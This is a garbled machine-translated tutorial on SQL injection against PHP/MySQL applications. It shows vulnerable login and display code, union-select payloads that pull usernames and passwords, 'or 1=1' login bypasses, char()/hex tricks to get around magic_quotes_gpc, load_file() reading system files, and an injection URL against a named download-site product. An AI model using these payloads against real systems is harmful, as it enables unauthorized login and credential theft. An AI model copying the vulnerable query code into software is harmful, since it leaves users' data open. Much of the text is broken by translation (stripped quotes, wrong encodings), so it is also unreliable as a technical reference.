Php injection xiangjie (2)

Let's build an injection statement.
Enter
A % and 1 = 2 union select 1, username, 3, 4, 5, 6, 7, 8, password, 10, 11 from
Alphaauthor # entered in SQL statements

Select * from alphadb where title like % a % and 1 = 2 union select
1, username, 3, 4, 5, 6, 7, 8, password, 10, 11 from alphaauthor # %

How about it? Come out, haha. Everything is under control.

C: Let's take a look at various injection attack methods from the injection location.
1) First, let's take a look at Background login.
CodeFirst
// Login. php
.......
$ Query = "select * from alphaauthor where UserName ="
. $ HTTP_POST_VARS ["UserName"]. "and
Password = ". $ HTTP_POST_VARS [" Password "]." ";
$ Result = mysql_query ($ query );
$ Data = mysql_fetch_array ($ result );
If ($ data)
{
Echo "background login successful ";
}
Esle
{
Echo "re-login ";
Exit;
}

.........
?>
The Username and password are directly executed in SQL without any processing.
Let's see how we can bypass it?
Which is the most classic one:
Enter both the user name and password
'Or =
Entered into SQL statements
Select * from alphaauthor where UserName = or = and Password = or =
The $ data obtained in this way is definitely true, that is, we have successfully logged in.
AndOthers.MethodThe principle is the same, that is, to find a way to make $ data return true.
We can use the following methods.
1.
Enter both the user name and password or a =
SQL
Select * from alphaauthor where UserName = or a = a and Password =
Or a =

2.
Enter or 1 = 1 and '=
SQL
Select * from alphaauthor where UserName = or 1 = 1 and '=
And Password = or 1 = 1 and '=

Enter or 2> 1 and '=
SQL
Select * from alphaauthor where UserName = or 2> 1 and '=
And Password = or 2> 1 and '=

3.
Username input or 1 = 1 # Password Input casually
SQL
Select * from alphaauthor where UserName = or 1 = 1 # and
Password = anything

The following part is commented out. Of course, the returned result is true.
4.
If admin id = 1, you can

Username input or id = 1 # Password Input casually
SQL
Select * from alphaauthor where UserName = or id = 1 # and Password = anything

How is it? Log in directly!

As the saying goes, nothing can be done.
There are more constructor Methods waiting for you to think about after class.

2) the second common injection should be the front-end information display area.
I have already mentioned it many times, and it involves Digital, numeric, and so on. I will not repeat it here.
Let's just give an example.
Bihai chaosheng download site-v2.0.3 lite has an injection vulnerability and the code will not be listed
View results directly
Http: // localhost/down/index. php? Url = & dlid = 1% 20and % 201 = 2% 20 union % 20 select %
18%, 2, password, 4, username, from %
20dl_users

Let's see what we want again.
Username alpha
A long string of passwords.
Why do we need to put the password in the 3 field and the username in the 5 field? We have already mentioned above, that is, we guess that the 3 and 5 fields should be strings, the field type of username and password should be the same as the one we want to display, so we put it in this way.
Why do we need 18 fields? I don't know if you still remember that in the introduction of union select, we mentioned that union must have the same number of select fields before and after it. We can increase the number of select to guess that 18 fields are required, only in this way will the content of union select be displayed normally!
3) For other data changes, user registration must be performed on user-level applications.
We have already mentioned the update and insert statements above, because they are not very common and will not be described here. We will discuss some advanced usage techniques for update and insert below.
II. The injection attack teaching session will be introduced below when magic_quotes_gpc = On
When magic_quotes_gpc = On ),
"(Double quotation marks), \ (backslash), and empty characters are automatically converted into escape characters containing the backslash.
This makes the injection method of the numeric model a bubble. At this time, we can only inject the numeric model
Intval () processing, we have already talked a lot about the number type, right? Because the number type does not use single quotes, it will naturally not be bypassed, in this case, we can inject it directly.
1) if it is character type, it must look like the following, without quotation marks on the characters.

Here we need to use some string processing functions first,
There are many string processing functions. Here we will mainly talk about the following. For details, referMysqlChinese Reference Manual 7.4.10.

Char () interprets the parameter as an integer and returns a string consisting of ASCII code characters of these integers.
Of course, you can also use the hexadecimal character to replace the character. In this way, add 0x before the hexadecimal character. You can see the example below.

// Login. php
......
$ Query = "select * from". $ art_system_db_table [user]."
Where UserName = $ username and Password = ". $ Pw ."";
......
?>

Suppose we know that the background username is alpha.
Converted to ASCII is char (97,108,112,104, 97)
The hexadecimal value is 0x616C706861.

All right, enter the following in the browser:

Http: // localhost/site/admin/login. php? Username = char (97,108,112,104, 97) % 23
The SQL statement is changed:

Select * from alphaAut

Hor where UserName = char (97,108,112,104, 97) # and Password =

 

As we expected, he ran smoothly and we got what we wanted.
Of course, we can also construct
Http: // localhost/site/admin/login. php? Username = 0x616C706861% 23
The SQL statement is changed:
Select * from alphaAuthor where UserName = 0x616C706861% 23 # and Password =
Once again we were successful. Have a sense of accomplishment,

Maybe you will ask if we can put # In char ().
Actually char (97,108,112,104, 97) is equivalent to alpha
Note that quotation marks are added to alpha to indicate the alpha string.
We know that if you execute

Mysql> select * from dl_users where username = alpha;
ERROR 1054 (42S22): Unknown column alpha in where clause
An error is returned. Because he thinks alpha is a variable. So we have to put quotation marks on alpha.
As follows:
Mysql> select * from dl_users where username = alpha;
This is correct.
If you put # in there, it becomes alpha #
Into SQL statements
Select * from dl_users where username = alpha #;
Of course there is nothing, because there is no alpha # user.
Okay. Let's take a look at the example below,

// Display. php
......
$ Query = "select * from". $ art_system_db_table [article]."
Where type = $ type;
......
?>

The Code displays the content based on the type. $ type is not filtered and put into the program without quotation marks.
Assume that the type contains the xiaohua class, And the char () of xiaohua is converted
Char (120,105, 97,111,104,117, 97)

We build
Http: // localhost/display. php? Type = char (120,105, 97,111,104,117, 97) and 1 = 2 union select 1, 2, username, 4, password, 6, 7, 8, 9, 10, 11 from alphaauthor
In the SQL statement:
Select * from ". $ art_system_db_table [article]."
Where type = char (120,105, 97,111,104,117, 97) and 1 = 2 union select 1, 2, username, 4, password, 6, 7, 8, 9, 10, 11 from alphaauthor
Let's take a look. Our user name and password are still available! No. Imagine P.

2) Some may ask if the powerful load_file () can be used in the case of magic_quotes_gpc = On?
This is the problem we will solve below. The format of load_file () is load_file ('file path)
We found that you only need to convert the 'file path to char. Try it.
Load_file ('C:/boot. ini)
Load_file (char (111,111,116, 46,105,110,105 ))
Figure 22

Put it in the specific Injection
Http: // localhost/down/index. php? Url = & dlid = 1% 20and % 201 = 2% 20 union % 20 select %
April 2, load_file (char
(111,111,116, 46,105,110,105,
17,18

Let's see the boot. ini content.
Unfortunately, into outfile cannot be bypassed, or it will be even better. However, there is still a place where select * from table into outfile can be used, that is... (sell a customs first, and we will tell you below)